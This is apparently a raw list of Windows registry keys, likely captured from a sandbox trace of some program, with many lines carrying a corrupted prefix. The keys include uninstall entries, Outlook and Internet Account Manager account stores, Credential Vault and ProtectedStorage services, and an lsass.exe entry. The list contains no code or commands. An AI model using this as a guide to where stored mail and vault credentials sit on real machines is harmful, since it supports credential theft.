\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-0000-0000000FF1CE}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4480055
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4480055\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A1EF1931-5EC5-38FE-B7D5-69FBF816716A}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{A1EF1931-5EC5-38FE-B7D5-69FBF816716A}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{A1EF1931-5EC5-38FE-B7D5-69FBF816716A}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AB0000000001}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AB0000000001}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AB0000000001}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AF12A465-EA47-447D-B6BF-2A82CDBE2F0E}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AF12A465-EA47-447D-B6BF-2A82CDBE2F0E}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AF12A465-EA47-447D-B6BF-2A82CDBE2F0E}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B1528EAE-7E64-49DB-8CE1-514EB30BB38B}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B1528EAE-7E64-49DB-8CE1-514EB30BB38B}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B1528EAE-7E64-49DB-8CE1-514EB30BB38B}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D09DF89B-E013-43F8-8ED8-6D6B9D4A1CDA}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{D09DF89B-E013-43F8-8ED8-6D6B9D4A1CDA}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{D09DF89B-E013-43F8-8ED8-6D6B9D4A1CDA}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E284B869-7701-4A91-82C2-D3E66974A0F9}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E284B869-7701-4A91-82C2-D3E66974A0F9}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E284B869-7701-4A91-82C2-D3E66974A0F9}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EE21EEE7-9D5A-4ECE-B60F-4BFA63BDA937}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{EE21EEE7-9D5A-4ECE-B60F-4BFA63BDA937}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{EE21EEE7-9D5A-4ECE-B60F-4BFA63BDA937}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F3DDE26C-E9E4-4AC1-AC61-E4390A496F0F}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F3DDE26C-E9E4-4AC1-AC61-E4390A496F0F}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F3DDE26C-E9E4-4AC1-AC61-E4390A496F0F}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{FE5BE50D-21D5-44FB-9A97-5010E68608DA}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{FE5BE50D-21D5-44FB-9A97-5010E68608DA}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{FE5BE50D-21D5-44FB-9A97-5010E68608DA}\DisplayVersion
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe
\x5bf8\x5afEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\DisplayName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3182483d-078b-48fa-92c2-798baa1fe27d}
\x5bf8\x5afEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{3182483d-078b-48fa-92c2-798baa1fe27d}\DisplayName
\x5bf8\x5afEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{3182483d-078b-48fa-92c2-798baa1fe27d}\DisplayVersion
HKEY_USERS\
HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-1339698970-4093829097-1161395185-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-1339698970-4093829097-1161395185-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe
HKEY_USERS\S-1-5-21-1339698970-4093829097-1161395185-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3182483d-078b-48fa-92c2-798baa1fe27d}
HKEY_USERS\S-1-5-21-1339698970-4093829097-1161395185-1000_Classes\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/zip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/zip\Extension
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
HKEY_CURRENT_USER\Identities
HKEY_CURRENT_USER\Identities\{5F37F099-726C-41B1-A10F-ADFDB822499D}\Software\Microsoft\Internet Account Manager\Accounts
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Account Manager
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Account Manager\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ObjectName
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\1E4\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\1E4\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\DisallowedCertSyncDeltaTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableMandatoryBasicConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableCANameConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableUnsupportedCriticalExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlCountInCert
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCountPerChain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCertCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\CryptnetPreFetchTriggerPeriodSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableWeakSignatureFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MinRsaPubKeyBitLength
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakRsaPubKeyTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\ChainCacheResyncFiletime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakMD5ThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakMD5ThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakMD5ThirdPartyAfterTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakMD5AllFlags
